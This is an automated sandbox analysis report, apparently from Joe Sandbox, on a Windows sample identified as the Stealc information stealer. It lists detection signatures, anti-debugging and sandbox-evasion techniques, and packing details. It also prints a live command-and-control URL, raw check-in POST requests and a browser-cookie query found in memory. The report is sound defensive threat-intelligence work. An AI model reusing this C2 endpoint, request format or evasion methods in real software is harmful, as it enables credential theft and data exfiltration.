Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532863
MD5:02fe6d790607494b5b820f41cdad2e17
SHA1:1e526eb65c6c1677ced067310193991805faeea1
SHA256:37008bff1b7f3719aee4bae2d90ba57c05618731bece25285e44160137e9c1d3
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02FE6D790607494B5B820F41CDAD2E17)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6312JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6312JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.9a0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T03:07:06.871801+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.9a0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpHVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpTVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 53%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_009AC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_009A9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009A7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_009A9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_009B8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009B38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009B4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_009ADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_009AE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_009AED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009B4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009AF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009B3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009A16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009ADE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_009ABE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="hwid"B88C617822D72284582127------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build"doma------HIDBFCBGDBKKECBFCGIE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_009A6280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 38 43 36 31 37 38 32 32 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 42 46 43 42 47 44 42 4b 4b 45 43 42 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="hwid"B88C617822D72284582127------HIDBFCBGDBKKECBFCGIEContent-Disposition: form-data; name="build"doma------HIDBFCBGDBKKECBFCGIE--
                Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1771889897.0000000001628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771889897.0000000001653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpH
                Source: file.exe, 00000000.00000002.1771889897.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC58B50_2_00CC58B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC084B0_2_00CC084B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B0730_2_00D6B073
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D629A40_2_00D629A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D67A930_2_00D67A93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6AA1B0_2_00C6AA1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6CBCF0_2_00D6CBCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6D46F0_2_00E6D46F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6145D0_2_00D6145D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5F4420_2_00D5F442
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD8C550_2_00CD8C55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D66C0E0_2_00D66C0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0FF9A0_2_00C0FF9A
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 009A45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: njbeecvb ZLIB complexity 0.9945937647964015
                Source: file.exe, 00000000.00000003.1730488499.0000000005480000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_009B8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_009B3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\WHM4L5LB.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1771889897.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies7;
                Source: file.exeVirustotal: Detection: 53%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1778176 > 1048576
                Source: file.exeStatic PE information: Raw size of njbeecvb is bigger than: 0x100000 < 0x18c000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njbeecvb:EW;zajrgpdb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njbeecvb:EW;zajrgpdb:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009B9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1b43e9 should be: 0x1be589
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: njbeecvb
                Source: file.exeStatic PE information: section name: zajrgpdb
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E8EF push ebp; mov dword ptr [esp], eax0_2_00E0E91E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E0E8EF push ebp; mov dword ptr [esp], 13E14D61h0_2_00E0E950
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC40C6 push 58EDF0C2h; mov dword ptr [esp], edx0_2_00DC40DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF08E7 push 031709D1h; mov dword ptr [esp], ecx0_2_00DF0915
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3D8B4 push ebp; mov dword ptr [esp], esi0_2_00E3D8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE4080 push edi; mov dword ptr [esp], ecx0_2_00DE413A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC58B5 push eax; mov dword ptr [esp], esi0_2_00CC5A0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC58B5 push 5213763Eh; mov dword ptr [esp], edx0_2_00CC5A33
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCC0A2 push eax; mov dword ptr [esp], ebp0_2_00DCC0C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E186 push esi; mov dword ptr [esp], 769BF136h0_2_0100E187
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E186 push 5DF75AC5h; mov dword ptr [esp], ebx0_2_0100E1C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E186 push ebx; mov dword ptr [esp], 50033243h0_2_0100E1DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E186 push edx; mov dword ptr [esp], ecx0_2_0100E22B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC084B push 530DF87Ah; mov dword ptr [esp], esi0_2_00CC0886
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF5847 push ecx; mov dword ptr [esp], 7B965AF1h0_2_00DF586E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push eax; mov dword ptr [esp], esi0_2_00D6B1B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push ecx; mov dword ptr [esp], 71FE0091h0_2_00D6B212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push eax; mov dword ptr [esp], edi0_2_00D6B224
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push esi; mov dword ptr [esp], eax0_2_00D6B230
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push 2F689483h; mov dword ptr [esp], esi0_2_00D6B24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push edi; mov dword ptr [esp], edx0_2_00D6B27D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push eax; mov dword ptr [esp], 53F3BBBBh0_2_00D6B281
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push 6385A7DBh; mov dword ptr [esp], edx0_2_00D6B2CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push esi; mov dword ptr [esp], eax0_2_00D6B2D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push esi; mov dword ptr [esp], ebx0_2_00D6B31C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push 31218F90h; mov dword ptr [esp], edi0_2_00D6B35F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push esi; mov dword ptr [esp], ecx0_2_00D6B394
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push 09E4C154h; mov dword ptr [esp], ebp0_2_00D6B39C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push ebx; mov dword ptr [esp], esi0_2_00D6B4B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push eax; mov dword ptr [esp], edx0_2_00D6B4F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6B073 push 02EE8C86h; mov dword ptr [esp], esi0_2_00D6B64C
                Source: file.exeStatic PE information: section name: njbeecvb entropy: 7.953282127630772

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009B9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13526
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72391 second address: D723A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F70ECA9ACh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D723A4 second address: D723B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F7085C59Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D723B8 second address: D723C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7130D second address: D71313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71313 second address: D71317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71317 second address: D71327 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F0F7085C596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71327 second address: D71334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007F0F70ECA9A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71611 second address: D71617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71617 second address: D7161B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7161B second address: D71625 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F7085C596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
